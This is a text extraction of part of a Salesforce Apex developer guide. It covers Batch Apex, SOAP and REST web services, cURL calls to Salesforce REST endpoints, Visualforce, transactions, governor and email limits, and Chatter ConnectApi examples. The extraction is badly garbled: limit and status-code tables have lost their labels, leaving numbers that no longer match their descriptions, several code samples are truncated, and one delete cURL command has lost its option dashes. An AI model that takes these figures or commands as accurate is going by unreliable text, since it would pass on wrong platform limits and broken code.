// Query for selecting the documents to delete
BDel.query = 'SELECT Id FROM Document WHERE FolderId=\'' + folderId +
'\' AND CreatedDate < '+d.format('yyyy-MM-dd')+'T'+
d.format('HH:mm')+':00.000Z';
// Invoke the batch job.
ID batchprocessid = Database.executeBatch(BDel);
System.debug('Returned batch process ID: ' + batchProcessId);
233
Invoking Apex
Batch Apex
Callouts include HTTP requests as well as methods defined with the webService keyword.
In addition, you can specify a variable to access the initial state of the class. You can use this variable to share the initial state with all
instances of the Database.Batchable methods. For example:
// Implement the interface using a list of Account sObjects
// Note that the initialState variable is declared as final
global class MyBatchable implements Database.Batchable<sObject> {
private final String initialState;
String query;
global MyBatchable(String intialState) {
this.initialState = initialState;
}
234
Invoking Apex
Batch Apex
Note that initialState is the initial state of the class. You cannot use it to pass information between instances of the class during
execution of the batch job. For example, if you changed the value of initialState in execute, the second chunk of processed
records would not be able to access the new value: only the initial value would be accessible.
235
Invoking Apex
Batch Apex
236
Invoking Apex
Batch Apex
If no size is specified with the optional scope parameter of Database.executeBatch, Salesforce chunks the records returned
by the start method into batches of 200, and then passes each batch to the execute method. Apex governor limits are reset
for each execution of execute.
The start, execute, and finish methods can implement up to 10 callouts each.
Only one batch Apex job's start method can run at a time in an organization. Batch jobs that havent started yet remain in the
queue until they're started. Note that this limit doesnt cause any batch job to fail and execute methods of batch Apex jobs still
run in parallel if more than one job is running.
237
Invoking Apex
Web Services
For a sharing recalculation, we recommend that the execute method delete and then re-create all Apex managed sharing for
the records in the batch. This ensures the sharing is accurate and complete.
Batch jobs queued before a Salesforce service maintenance downtime remain in the queue. After service downtime ends and when
system resources become available, the queued batch jobs are executed. If a batch job was running when downtime occurred, the
batch execution is rolled back and restarted after the service comes back up.
SEE ALSO:
Batchable Interface
Web Services
Exposing Apex Methods as SOAP Web Services
You can expose your Apex methods as SOAP Web services so that external applications can access your code and your application. To
expose your Apex methods, use WebService Methods.
Tip:
Apex SOAP Web services allow an external application to invoke Apex methods through SOAP Web services. Apex callouts
enable Apex to invoke external Web or HTTP services.
Apex REST API exposes your Apex classes and methods as REST Web services. See Exposing Apex Classes as REST Web Services.
WebService Methods
Apex class methods can be exposed as custom SOAP Web service calls. This allows an external application to invoke an Apex Web service
to perform an action in Salesforce. Use the webService keyword to define these methods. For example:
global class MyWebService {
webService static Id makeContact(String lastName, Account a) {
Contact c = new Contact(lastName = 'Weissman', AccountId = a.Id);
insert c;
return c.id;
}
}
A developer of an external application can integrate with an Apex class containing webService methods by generating a WSDL for
the class. To generate a WSDL from an Apex class detail page:
1. In the application from Setup, click Develop > Apex Classes.
2. Click the name of a class that contains webService methods.
3. Click Generate WSDL.
238
Invoking Apex
Warning: Apex class methods that are exposed through the API with the webService keyword don't enforce object permissions
and field-level security by default. We recommend that you make use of the appropriate object or field describe result methods
to check the current users access level on the objects and fields that the webService method is accessing. See DescribeSObjectResult
Class and DescribeFieldResult Class.
Also, sharing rules (record-level access) are enforced only when declaring a class with the with sharing keyword. This
requirement applies to all Apex classes, including to classes that contain webService methods. To enforce sharing rules for
webService methods, declare the class that contains these methods with the with sharing keyword. See Using the with
sharing or without sharing Keywords.
239
Invoking Apex
The following example shows a class with Web service member variables as well as a Web service method:
global class SpecialAccounts {
global class AccountInfo {
webService String AcctName;
webService Integer AcctNumber;
}
webService static Account createAccount(AccountInfo info) {
Account acct = new Account();
acct.Name = info.AcctName;
acct.AccountNumber = String.valueOf(info.AcctNumber);
insert acct;
return acct;
}
webService static Id [] createAccounts(Account parent,
Account child, Account grandChild) {
insert parent;
child.parentId = parent.Id;
insert child;
grandChild.parentId = child.Id;
insert grandChild;
Id [] results = new Id[3];
results[0] = parent.Id;
results[1] = child.Id;
results[2] = grandChild.Id;
return results;
}
}
// Test class for the previous class.
@isTest
private class SpecialAccountsTest {
testMethod static void testAccountCreate() {
SpecialAccounts.AccountInfo info = new SpecialAccounts.AccountInfo();
info.AcctName = 'Manoj Cheenath';
info.AcctNumber = 12345;
Account acct = SpecialAccounts.createAccount(info);
System.assert(acct != null);
}
}
You can invoke this Web service using AJAX. For more information, see Apex in AJAX on page 254.
240
Invoking Apex
Description
RestContext Class
request
response
Governor Limits
Calls to Apex REST classes count against the organization's API governor limits. All standard Apex governor limits apply to Apex REST
classes. For example, the maximum request or response size is 3 MB. For more information, see Understanding Execution Governors and
Limits.
Authentication
Apex REST supports these authentication mechanisms:
OAuth 2.0
Session ID
See Step Two: Set Up Authorization in the REST API Developer's Guide.
241
Invoking Apex
If the Apex method has no parameters, Apex REST copies the HTTP request body into the RestRequest.requestBody
property. If the method has parameters, then Apex REST attempts to deserialize the data into those parameters and the data won't
be deserialized into the RestRequest.requestBody property.
Apex REST uses similar serialization logic for the response. An Apex method with a non-void return type will have the return value
serialized into RestResponse.responseBody.
Apex REST methods can be used in managed and unmanaged packages. When calling Apex REST methods that are contained in a
managed package, you need to include the managed package namespace in the REST call URL. For example, if the class is contained
in a managed package namespace called packageNamespace and the Apex REST methods use a URL mapping of
/MyMethod/*, the URL used via REST to call these methods would be of the form
https://instance.salesforce.com/services/apexrest/packageNamespace/MyMethod/. For more
information about managed packages, see What is a Package?.
If a login call is made from the API for a user with an expired or temporary password, subsequent API calls to custom Apex REST Web
service methods aren't supported and result in the MUTUAL_AUTHENTICATION_FAILED error. Reset the user's password and make
a call with an unexpired password to be able to call Apex Web service methods.
242
Invoking Apex
User-Defined Types
You can use user-defined types for parameters in your Apex REST methods. Apex REST deserializes request data into public, private,
or global class member variables of the user-defined type, unless the variable is declared as static or transient. For example,
an Apex REST method that contains a user-defined type parameter might look like the following:
@RestResource(urlMapping='/user_defined_type_example/*')
global with sharing class MyOwnTypeRestResource {
@HttpPost
global static MyUserDefinedClass echoMyType(MyUserDefinedClass ic) {
return ic;
}
global class MyUserDefinedClass {
global String string1;
global String string2 { get; set; }
private String privateString;
global transient String transientString;
global static String staticString;
}
}
Valid JSON and XML request data for this method would look like:
{
"ic" : {
"string1" : "value for string1",
"string2" : "value for string2",
"privateString" : "value for privateString"
}
}
<request>
<ic>
<string1>value for string1</string1>
<string2>value for string2</string2>
<privateString>value for privateString</privateString>
</ic>
</request>
If a value for staticString or transientString is provided in the example request data above, an HTTP 400 status code
response is generated. Note that the public, private, or global class member variables must be types allowed by Apex REST:
Apex primitives (excluding sObject and Blob).
sObjects
Lists or maps of Apex primitives or sObjects (only maps with String keys are supported).
When creating user-defined types used as Apex REST method parameters, avoid introducing any class member variable definitions that
result in cycles (definitions that depend on each other) at run time in your user-defined types. Here's a simple example:
@RestResource(urlMapping='/CycleExample/*')
global with sharing class ApexRESTCycleExample {
243
Invoking Apex
@HttpGet
global static MyUserDef1 doCycleTest() {
MyUserDef1 def1 = new MyUserDef1();
MyUserDef2 def2 = new MyUserDef2();
def1.userDef2 = def2;
def2.userDef1 = def1;
return def1;
}
global class MyUserDef1 {
MyUserDef2 userDef2;
}
global class MyUserDef2 {
MyUserDef1 userDef1;
}
}
The code in the previous example compiles, but at run time when a request is made, Apex REST detects a cycle between instances of
def1 and def2, and generates an HTTP 400 status code error response.
:
:
:
:
}
<request>
<s1>my first string</s1>
<i1>123</i1>
<s2>my second string</s2>
<b1>false</b1>
</request>
The URL patterns URLpattern and URLpattern/* match the same URL. If one class has a urlMapping of URLpattern
and another class has a urlMapping of URLpattern/*, a REST request for this URL pattern resolves to the class that was saved
last.
Some parameter and return types can't be used with XML as the Content-Type for the request or as the accepted format for the
response, and hence, methods with these parameter or return types can't be used with XML. Maps or collections of collections, for
example, List<List<String>> aren't supported. However, you can use these types with JSON. If the parameter list includes
244
Invoking Apex
a type that's invalid for XML and XML is sent, an HTTP 415 status code is returned. If the return type is a type that's invalid for XML
and XML is the requested response format, an HTTP 406 status code is returned.
For request data in either JSON or XML, valid values for Boolean parameters are: true, false (both of these are treated as
case-insensitive), 1 and 0 (the numeric values, not strings of 1 or 0). Any other values for Boolean parameters result in an error.
If the JSON or XML request data contains multiple parameters of the same name, this results in an HTTP 400 status code error response.
For example, if your method specifies an input parameter named x, the following JSON request data results in an error:
{
"x" : "value1",
"x" : "value2"
}
Similarly, for user-defined types, if the request data includes data for the same user-defined type member variable multiple times,
this results in an error. For example, given this Apex REST method and user-defined type:
@RestResource(urlMapping='/DuplicateParamsExample/*')
global with sharing class ApexRESTDuplicateParamsExample {
@HttpPost
global static MyUserDef1 doDuplicateParamsTest(MyUserDef1 def) {
return def;
}
global class MyUserDef1 {
Integer i;
}
}
If you need to specify a null value for one of your parameters in your request data, you can either omit the parameter entirely or
specify a null value. In JSON, you can specify null as the value. In XML, you must use the
http://www.w3.org/2001/XMLSchema-instance namespace with a nil value.
For XML request data, you must specify an XML namespace that references any Apex namespace your method uses. So, for example,
if you define an Apex REST method such as:
@RestResource(urlMapping='/namespaceExample/*')
global class MyNamespaceTest {
@HttpPost
global static MyUDT echoTest(MyUDT def, String extraString) {
return def;
}
global class MyUDT {
Integer count;
245
Invoking Apex
}
}
Response Status
Code
Description
GET
200
PATCH
200
PATCH
204
400
403
404
404
404
405
406
406
406
415
415
246
Invoking Apex
Request Method
Response Status
Code
Description
500
SEE ALSO:
JSON Support
XML Support
247
Invoking Apex
2. To call the doGet method from a client, open a command-line window and execute the following cURL command to retrieve
an account by ID:
curl -H "Authorization: Bearer sessionId"
"https://instance.salesforce.com/services/apexrest/Account/accountId"
Replace sessionId with the <sessionId> element that you noted in the login response.
Replace instance with your <serverUrl> element.
Replace accountId with the ID of an account which exists in your organization.
After calling the doGet method, Salesforce returns a JSON response with data such as the following:
{
"attributes" :
{
"type" : "Account",
"url" : "/services/data/v22.0/sobjects/Account/accountId"
},
"Id" : "accountId",
"Name" : "Acme"
}
Note: The cURL examples in this section don't use a namespaced Apex class so you won't see the namespace in the URL.
248
Invoking Apex
3. Create a file called account.txt to contain the data for the account you will create in the next step.
{
"name" : "Wingo Ducks",
"phone" : "707-555-1234",
"website" : "www.wingo.ca.us"
}
4. Using a command-line window, execute the following cURL command to create a new account:
curl -H "Authorization: Bearer sessionId" -H "Content-Type: application/json" -d
@account.txt "https://instance.salesforce.com/services/apexrest/Account/"
After calling the doPost method, Salesforce returns a response with data such as the following:
"accountId"
The accountId is the ID of the account you just created with the POST request.
5. Using a command-line window, execute the following cURL command to delete an account by specifying the ID:
curl X DELETE H "Authorization: Bearer sessionId"
"https://instance.salesforce.com/services/apexrest/Account/accountId"
2. Open a command-line window and execute the following cURL command to upload the attachment to a case:
249
Invoking Apex
Replace sessionId with the <sessionId> element that you noted in the login response.
Replace instance with your <serverUrl> element.
Replace caseId with the ID of the case you want to add the attachment to.
Replace file with the path and file name of the file you want to attach.
Your command should look something like this (with the sessionId replaced with your session ID):
curl -H "Authorization: Bearer sessionId"
-H "X-PrettyPrint: 1" -H "Content-Type: image/jpeg" --data-binary
@c:\test\vehiclephoto1.jpg
"https://na1.salesforce.com/services/apexrest/CaseManagement/v1/500D0000003aCts"
Note: The cURL examples in this section don't use a namespaced Apex class so you won't see the namespace in the URL.
The Apex class returns a JSON response that contains the attachment ID such as the following:
"00PD0000001y7BfMAI"
3. To verify that the attachment and the image were added to the case, navigate to Cases and select the All Open Cases view. Click
on the case and then scroll down to the Attachments related list. You should see the attachment you just created.
250
Invoking Apex
Salesforce limits the total number of messages that all email services combined, including On-Demand Email-to-Case, can process
daily. Messages that exceed this limit are bounced, discarded, or queued for processing the next day, depending on how you
configure the failure response settings for each email service. Salesforce calculates the limit by multiplying the number of user
licenses by 1,000, up to a daily maximum of 1,000,000. For example, if you have 10 licenses, your organization can process up to
10,000 email messages a day.
Email service addresses that you create in your sandbox cannot be copied to your production organization.
For each email service, you can tell Salesforce to send error email messages to a specified address instead of the sender's email
address.
Email services reject email messages and notify the sender if the email (combined body text, body HTML, and attachments) exceeds
approximately 10 MB (varies depending on language and character set).
251
Invoking Apex
Visualforce Classes
SEE ALSO:
InboundEmail Class
InboundEnvelope Class
InboundEmailResult Class
Visualforce Classes
In addition to giving developers the ability to add business logic to Salesforce system events such as button clicks and related record
updates, Apex can also be used to provide custom logic for Visualforce pages through custom Visualforce controllers and controller
extensions:
A custom controller is a class written in Apex that implements all of a page's logic, without leveraging a standard controller. If you
use a custom controller, you can define new navigation elements or behaviors, but you must also reimplement any functionality
that was already provided in a standard controller.
Like other Apex classes, custom controllers execute entirely in system mode, in which the object and field-level permissions of the
current user are ignored. You can specify whether a user can execute methods in a custom controller based on the user's profile.
A controller extension is a class written in Apex that adds to or overrides behavior in a standard or custom controller. Extensions
allow you to leverage the functionality of another controller while adding your own custom logic.
Because standard controllers execute in user mode, in which the permissions, field-level security, and sharing rules of the current
user are enforced, extending a standard controller allows you to build a Visualforce page that respects user permissions. Although
the extension class executes in system mode, the standard controller executes in user mode. As with custom controllers, you can
specify whether a user can execute methods in a controller extension based on the user's profile.
252
Invoking Apex
You can use these system-supplied Apex classes when building custom Visualforce controllers and controller extensions.
Action
Dynamic Component
IdeaStandardController
IdeaStandardSetController
KnowledgeArticleVersionStandardController
Message
PageReference
SelectOption
StandardController
StandardSetController
In addition to these classes, the transient keyword can be used when declaring methods in controllers and controller extensions.
For more information, see Using the transient Keyword on page 77.
For more information on Visualforce, see the Visualforce Developer's Guide.
To use JavaScript remoting in a Visualforce page, add the request as a JavaScript invocation with the following form:
[namespace.]controller.method(
[parameters...,]
callbackFunction,
[configuration]
);
namespace is the namespace of the controller class. This is required if your organization has a namespace defined, or if the class
comes from an installed package.
controller is the name of your Apex controller.
method is the name of the Apex method youre calling.
parameters is the comma-separated list of parameters that your method takes.
253
Invoking Apex
Apex in AJAX
callbackFunction is the name of the JavaScript function that will handle the response from the controller. You can also
declare an anonymous function inline. callbackFunction receives the status of the method call and the result as parameters.
configuration configures the handling of the remote call and response. Use this to change the behavior of a remoting call,
such as whether or not to escape the Apex methods response.
For more information, see JavaScript Remoting for Apex Controllers in the Visualforce Developer's Guide.
Apex in AJAX
The AJAX toolkit includes built-in support for invoking Apex through anonymous blocks or public webService methods. To do so,
include the following lines in your AJAX code:
<script src="/soap/ajax/15.0/connection.js" type="text/javascript"></script>
<script src="/soap/ajax/15.0/apex.js" type="text/javascript"></script>
Note: For AJAX buttons, use the alternate forms of these includes.
To invoke Apex, use one of the following two methods:
Execute anonymously via sforce.apex.executeAnonymous (script). This method returns a result similar to the API's
result type, but as a JavaScript structure.
Use a class WSDL. For example, you can call the following Apex class:
global class myClass {
webService static Id makeContact(String lastName, Account a) {
Contact c = new Contact(LastName = lastName, AccountId = a.Id);
return c.id;
}
}
The execute method takes primitive data types, sObjects, and lists of primitives or sObjects.
To call a webService method with no parameters, use {} as the third parameter for sforce.apex.execute. For example,
to call the following Apex class:
global class myClass{
webService static String getContextUserName() {
return UserInfo.getFirstName();
}
}
254
Invoking Apex
Apex in AJAX
Note: If a namespace has been defined for your organization, you must include it in the JavaScript code when you invoke
the class. For example, to call the above class, the JavaScript code from above would be rewritten as follows:
var contextUser = sforce.apex.execute("myNamespace.myClass", "getContextUserName",
{});
To verify whether your organization has a namespace, log in to your Salesforce organization and from Setup, click Create >
Packages. If a namespace is defined, it is listed under Developer Settings.
Both examples result in native JavaScript values that represent the return type of the methods.
Use the following line to display a popup window with debugging information:
sforce.debug.trace=true;
255
CHAPTER 9
In this chapter ...
Apex Transactions
Understanding
Execution Governors
and Limits
256
Apex Transactions
Apex Transactions
An Apex transaction represents a set of operations that are executed as a single unit. All DML operations in a transaction either complete
successfully, or if an error occurs in one operation, the entire transaction is rolled back and no data is committed to the database. The
boundary of a transaction can be a trigger, a class method, an anonymous block of code, a Visualforce page, or a custom Web service
method.
All operations that occur inside the transaction boundary represent a single unit of operations. This also applies for calls that are made
from the transaction boundary to external code, such as classes or triggers that get fired as a result of the code running in the transaction
boundary. For example, consider the following chain of operations: a custom Apex Web service method causes a trigger to fire, which
in turn calls a method in a class. In this case, all changes are committed to the database only after all operations in the transaction finish
executing and dont cause any errors. If an error occurs in any of the intermediate steps, all database changes are rolled back and the
transaction isnt committed.
Note: An Apex transaction is sometimes referred to as an execution context. Both terms refer to the same thing. This guide uses
the Apex transaction term.
Example
This example shows how all DML insert operations in a method are rolled back when the last operation causes a validation rule
failure. In this example, the invoice method is the transaction boundaryall code that runs within this method either commits all
changes to the platform database or rolls back all changes. In this case, we add a new invoice statement with a line item for the pencils
merchandise. The Line Item is for a purchase of 5,000 pencils specified in the Units_Sold__c field, which is more than the entire pencils
inventory of 1,000. This example assumes a validation rule has been set up to check that the total inventory of the merchandise item is
enough to cover new purchases.
Since this example attempts to purchase more pencils (5,000) than items in stock (1,000), the validation rule fails and throws an exception.
Code execution halts at this point and all DML operations processed before this exception are rolled back. In this case, the invoice
statement and line item wont be added to the database, and their insert DML operations are rolled back.
In the Developer Console, execute the static invoice method.
//
//
//
Id
This is the definition of the invoice method. In this case, the update of total inventory causes an exception due to the validation rule
failure. As a result, the invoice statements and line items will be rolled back and wont be inserted into the database.
public class MerchandiseOperations {
public static Id invoice( String pName, Integer pSold, String pDesc) {
// Retrieve the pencils sample merchandise
Merchandise__c m = [SELECT Price__c,Total_Inventory__c
257
258
Description
Total number of SOQL queries issued1
Synchronous
Limit
Asynchronous
Limit
100
200
50,000
10,000
20
2,000
150
10,000
Total stack depth for any Apex invocation that recursively fires triggers due to insert,
3
update, or delete statements
16
100
Maximum timeout for all callouts (HTTP requests or Web services calls) in a transaction
120 seconds
Maximum number of methods with the future annotation allowed per Apex invocation
50
50
10
6 MB
12 MB
10 minutes
10
Maximum number of push notification method calls allowed per Apex transaction
10
Maximum number of push notifications that can be sent in each push notification method
call
2,000
In a SOQL query with parent-child relationship sub-queries, each parent-child relationship counts as an additional query. These types
of queries have a limit of three times the number for top-level queries. The row counts from these relationship queries contribute to the
row counts of the overall code execution. In addition to static SOQL statements, calls to the following methods count against the number
of SOQL statements issued in a request.
Database.countQuery
Database.getQueryLocator
Database.query
2
Calls to the following methods count against the number of DML queries issued in a request.
Approval.process
Database.convertLead
259
Database.emptyRecycleBin
Database.rollback
Database.setSavePoint
delete and Database.delete
insert and Database.insert
merge and Database.merge
undelete and Database.undelete
update and Database.update
upsert and Database.upsert
System.runAs
3
Recursive Apex that does not fire any triggers with insert, update, or delete statements exists in a single invocation, with a
single stack. Conversely, recursive Apex that fires a trigger spawns the trigger in a new Apex invocation, separate from the invocation
of the code that caused it to fire. Because spawning a new invocation of Apex is a more expensive operation than a recursive call in a
single invocation, there are tighter restrictions on the stack depth of these types of recursive calls.
4
CPU time is calculated for all executions on the Salesforce application servers occurring in one Apex transactionfor the executing
Apex code, and any processes that are called from this code, such as package code and workflows. CPU time is private for a transaction
and is isolated from other transactions. Operations that dont consume application server CPU time arent counted toward CPU time. For
example, the portion of execution time spent in the database for DML, SOQL, and SOSL isnt counted, nor is waiting time for Apex callouts.
6
In a single transaction, you can only reference 10 unique namespaces. For example, suppose you have an object that executes a class
in a managed package when the object is updated. Then that class updates a second object, which in turn executes a different class in
a different package. Even though the second package wasnt accessed directly by the first, because it occurs in the same transaction,
its included in the number of namespaces being accessed in a single transaction.
Note:
Limits apply individually to each testMethod.
Use the Limits methods to determine the code execution limits for your code while it is running. For example, you can use the
getDMLStatements method to determine the number of DML statements that have already been called by your program,
or the getLimitDMLStatements method to determine the total number of DML statements available to your code.
260
Limit
The maximum number of asynchronous Apex method executions (batch Apex, future methods,
queueable Apex, and scheduled Apex) per a 24-hour period1
Number of synchronous concurrent requests for long-running requests that last longer than 5 seconds 10
for each organization. 2
Maximum simultaneous requests to URLs with the same host for a callout request3
20
100
Maximum number of test classes that can be queued per 24-hour period (production organizations The greater of 500 or 10
other than Developer Edition)5
multiplied by the number of test
classes in the organization
Maximum number of test classes that can be queued per 24-hour period (sandbox and Developer The greater of 500 or 20
Edition organizations)5
multiplied by the number of test
classes in the organization
Maximum number of query cursors open concurrently per user6
50
Maximum number of query cursors open concurrently per user for the Batch Apex start method 15
Maximum number of query cursors open concurrently per user for the Batch Apex execute and 5
finish methods
For Batch Apex, method executions include executions of the start, execute, and finish methods. This is an organization-wide
limit and is shared with all asynchronous Apex: Batch Apex, scheduled Apex, and future methods. The licenses that count toward this
limit are full Salesforce user licenses or Force.com App Subscription user licenses. Chatter Free, Chatter customer users, Customer Portal
User, and partner portal User licenses arent included.
2
If additional requests are made while the 10 long-running requests are still running, theyre denied.
261
The host is defined by the unique subdomain for the URL, for example, www.mysite.com and extra.mysite.com are two
different hosts. This limit is calculated across all organizations that access the same host. If this limit is exceeded, a CalloutException
will be thrown.
4
Batch jobs that havent started yet remain in the queue until they're started. Note that this limit doesnt cause any batch job to fail and
execute methods of batch Apex jobs still run in parallel if more than one job is running.
5
This limit applies to tests running asynchronously. This includes tests started through the Salesforce user interface including the
Developer Console or by inserting ApexTestQueueItem objects using SOAP API.
6
For example, if 50 cursors are open and a client application still logged in as the same user attempts to open a new one, the oldest of
the 50 cursors is released. Cursor limits for different Force.com features are tracked separately. For example, you can have 50 Apex query
cursors, 15 cursors for the Batch Apex start method, 5 cursors for the Batch Apex execute and finish methods each, and 5
Visualforce cursors open at the same time.
Limit
10 seconds
Maximum size of callout request or response (HTTP request or Web services call)1
3 MB
Maximum SOQL query run time before the transaction can be canceled by Salesforce
120 seconds
5,000
200
Maximum number of records returned for a Batch Apex query in Database.QueryLocator 50 million
The HTTP request and response sizes count towards the total heap size.
Limit
1 million
1 million
3 MB
This limit does not apply to certified managed packages installed from AppExchange (that is, an app that has been marked AppExchange
Certified). The code in those types of packages belong to a namespace unique from the code in your organization. For more information
on AppExchange Certified packages, see the Force.com AppExchange online help. This limit also does not apply to any code included
in a class defined with the @isTest annotation.
2
Large methods that exceed the allowed limit cause an exception to be thrown during the execution of your code.
262
Email Limits
Inbound Email Limits
Email Services: Maximum Number of Email Messages Processed
(Includes limit for On-Demand Email-to-Case)
10 MB1
25 MB
The maximum size of email messages for Email Services varies depending on language and character set.
263
Outbound Email: Limits for Single and Mass Email Sent Using Apex
Using the API or Apex, you can send single emails to a maximum of 1,000 external email addresses per day based on Greenwich
Mean Time (GMT). Single emails sent using the Salesforce application don't count toward this limit. Theres no limit on sending
individual emails to contacts, leads, person accounts, and users in your organization directly from account, contact, lead, opportunity,
case, campaign, or custom object pages.
When sending single emails, keep in mind:
You can send 100 emails per SingleEmailMessage.
If you use SingleEmailMessage to email your organizations internal users, specifying the users ID in
setTargetObjectId means the email doesnt count toward the daily limit. However, specifying internal users email
addresseses in setToAddresses means the email does count toward the limit.
You can send mass email to a maximum of 1,000 external email addresses per day per organization based on Greenwich Mean Time
(GMT). The maximum number of external addresses you can include in each mass email depends on your edition:
Edition
Professional Edition
250
Enterprise Edition
500
1,000
Limit
264
Only deliverable notifications count toward this limit. For example, consider the scenario where a notification is sent to 1,000 employees
in your company, but 100 employees havent installed the mobile application yet. Only the notifications sent to the 900 employees who
have installed the mobile application count toward this limit.
Each test push notification that is generated through the Test Push Notification page is limited to a single recipient. Test push notifications
count toward an applications daily push notification limit.
265
266
List<Invoice_Statement__c> invoicesWithLineItems =
[SELECT Id,Description__c,(SELECT Id,Units_Sold__c,Merchandise__c from Line_Items__r)
FROM Invoice_Statement__c WHERE Id IN :Trigger.newMap.KeySet()];
for(Invoice_Statement__c inv : invoicesWithLineItems) {
for(Line_Item__c li : inv.Line_Items__r) {
// Do something
}
}
}
267
Approval Processing
Outbound Email
Inbound Email
Knowledge
Management
Promoted Search
Terms
Actions
Force.com Sites
Support Classes
Visual Workflow
Passing Data to a
Flow Using the
Process.Plugin
Interface
Communities
Zones
Territory
Management 2.0
Salesforce1 Reporting
API via Apex
Several Salesforce application features in the user interface are exposed in Apex enabling programmatic
access to those features in the Force.com platform.
For example, using Chatter in Apex enables you to post a message to a Chatter feed. Using the approval
methods, you can submit approval process requests and approve these requests.
268
269
The second parameter, subjectId is the ID of the parent this feed element is posted to. The value can be the ID of a user, group, or
record, or the string me to indicate the context user.
SEE ALSO:
postFeedElement(String, String, ConnectApi.FeedElementType, String)
270
SEE ALSO:
postFeedElement(String, ConnectApi.FeedElementInput, ConnectApi.BinaryInput)
271
SEE ALSO:
postFeedElement(String, ConnectApi.FeedElementInput, ConnectApi.BinaryInput)
SEE ALSO:
postFeedElement(String, ConnectApi.FeedElementInput, ConnectApi.BinaryInput)
272
SEE ALSO:
postFeedElementBatch(String, List<ConnectApi.BatchInput>)
273
contentInput.title = 'Title';
ConnectApi.FeedElementCapabilitiesInput capabilities = new
ConnectApi.FeedElementCapabilitiesInput();
capabilities.content = contentInput;
input.capabilities = capabilities;
String text = 'We are words in a file.';
Blob myBlob = Blob.valueOf(text);
ConnectApi.BinaryInput binInput = new ConnectApi.BinaryInput(myBlob, 'text/plain',
'fileName');
ConnectApi.BatchInput batchInput = new ConnectApi.BatchInput(input, binInput);
batchInputs.add(batchInput);
}
ConnectApi.ChatterFeeds.postFeedElementBatch(Network.getNetworkId(), batchInputs);
SEE ALSO:
postFeedElementBatch(String, List<ConnectApi.BatchInput>)
SEE ALSO:
likeFeedElement(String, String)
SEE ALSO:
updateFeedElementBookmarks(String, String, Boolean)
274
SEE ALSO:
shareFeedElement(String, String, ConnectApi.FeedElementType, String)
SEE ALSO:
postFeedElement(String, ConnectApi.FeedElementInput, ConnectApi.BinaryInput)
Post a Comment
This example calls postCommentToFeedElement(String, String, String) to post a plain text comment to a feed element.
ConnectApi.Comment comment = ConnectApi.ChatterFeeds.postCommentToFeedElement(null,
'0D5D0000000KuGh', 'I agree with the proposal.' );
SEE ALSO:
postCommentToFeedElement(String, String, String)
275
SEE ALSO:
postCommentToFeedElement(String, String, ConnectApi.CommentInput, ConnectApi.BinaryInput)
276
commentCapabilitiesInput.content = contentCapabilityInput;
contentCapabilityInput.contentDocumentId = '069D00000001rNJ';
commentInput.capabilities = commentCapabilitiesInput;
ConnectApi.Comment commentRep =
ConnectApi.ChatterFeeds.postCommentToFeedElement(Network.getNetworkId(), feedElementId,
commentInput, null);
SEE ALSO:
postCommentToFeedElement(String, String, ConnectApi.CommentInput, ConnectApi.BinaryInput)
277
ConnectApi.ChatterFeeds.postCommentToFeedElement(Network.getNetworkId(), feedElementId,
commentInput, binInput);
SEE ALSO:
postCommentToFeedElement(String, String, ConnectApi.CommentInput, ConnectApi.BinaryInput)
Follow a Record
This example calls the follow(String, String, String) method to follow a record.
ChatterUsers.ConnectApi.Subscription subscriptionToRecord =
ConnectApi.ChatterUsers.follow(null, 'me', '001RR000002G4Y0');
SEE ALSO:
follow(String, String, String)
Unfollow a Record
Unfollow a Record
When you follow a record, the call to ConnectApi.ChatterUsers.follow returns a ConnectApi.Subscription
object. To unfollow a record, pass the id property of that object to the deleteSubscription(String, String) method.
ConnectApi.Chatter.deleteSubscription(null, '0E8RR0000004CnK0AU');
SEE ALSO:
deleteSubscription(String, String)
Follow a Record
The successful execution of a ConnectApi method can return an output object from the ConnectApi namespace. ConnectApi
output objects can be made up of other output objects. For example, the ConnectApi.ActorWithId output object contains
properties such as id and url, which contain primitive data types. It also contains a mySubscription property, which contains
a ConnectApi.Reference object.
Note: All Salesforce IDs in ConnectApi output objects are 18 character IDs. Input objects can use 15 character IDs or 18
character IDs.
SEE ALSO:
ConnectApi Input Classes
ConnectApi Output Classes
278
If you specify 'internal', URLs returned in the output use the same format:
/connect/communities/internal/resource
If you specify null, URLs returned in the output use one of these formats:
/chatter/resource
/connect/resource
279
Important: These ChatterFeeds feed item methods are available to guest users only in version 31.0. In version 32.0 and
later, the ChatterFeeds feed element methods are available to guest users.
getCommentsForFeedItem()
getFeedItem()
getFeedItemBatch()
getFeedItemsFromFeed()
getFeedItemsUpdatedSince()
getLikesForFeedItem()
searchFeedItems()
searchFeedItemsInFeed()
ChatterGroups methods:
getGroup()
getGroups()
searchGroups()
ChatterUsers methods:
getFollowers()
getFollowings()
getGroups()
getPhoto()
getReputation()
getUser()
getUserBatch()
getUsers()
searchUserGroups()
searchUsers()
ManagedTopics methods:
getManagedTopic()
getManagedTopics()
Topics methods:
getGroupsRecentlyTalkingAboutTopic()
getRecentlyTalkingAboutTopicsForGroup()
getRecentlyTalkingAboutTopicsForUser()
getRelatedTopics()
getTopic()
getTopics()
getTrendingTopics()
280
Capabilities
As part of the effort to diversify the feed, pieces of functionality found in feed elements have been broken out into capabilities. Capabilities
provide a consistent way to interact with objects in the feed. Instead of inspecting feed element type and using other indirect means
to determine which functionality is available for a specific feed element, the capability object tells you explicitly whats available. Check
for the presence of a capability to determine what a client can do to a feed element.
The ConnectApi.FeedElement.capabilities property holds a ConnectApi.FeedElementCapabilities
object, which holds a set of capability objects.
A capability object includes both an indication that a feature is possible and data associated with that feature. If a capability property
exists on a feed element, that capability is available, even if there isnt any data associated with the capability yet. For example, if the
chatterLikes capability property exists on a feed element (with or without any likes included in the list of likes found in the
chatterLikes.page.items property), the context user can like that feed element. If the capability property doesnt exist on a
feed element, it isnt possible to like that feed element.
When posting a feed element, specify its characteristics in the ConnectApi.FeedElementInput.capabilities property.
281
How the Salesforce Displays Feed Elements other than Feed Items
As we learned in the Capabilities section, a client should use the ConnectApi.FeedElement.capabilities property to
determine what it can do with a feed element and how it should render a feed element. This section uses bundles as an example of
282
how to render a feed element, but these properties are available for every feed element. Capabilities allow you to handle all content in
the feed consistently.
Note: Bundled posts are available through a pilot program. For information, contact Salesforce. During the pilot, bundles contain
only feed-tracked changes.
To give customers a clean, organized feed, Salesforce aggregates feed-tracked changes into a bundle. To see individual feed elements,
click on the bundle.
283
Feed Types
There are many types of feeds. Each feed type is an algorithm that defines a collection of feed elements.
Important: The algorithms, and therefore the collection of feed elements, can change between releases.
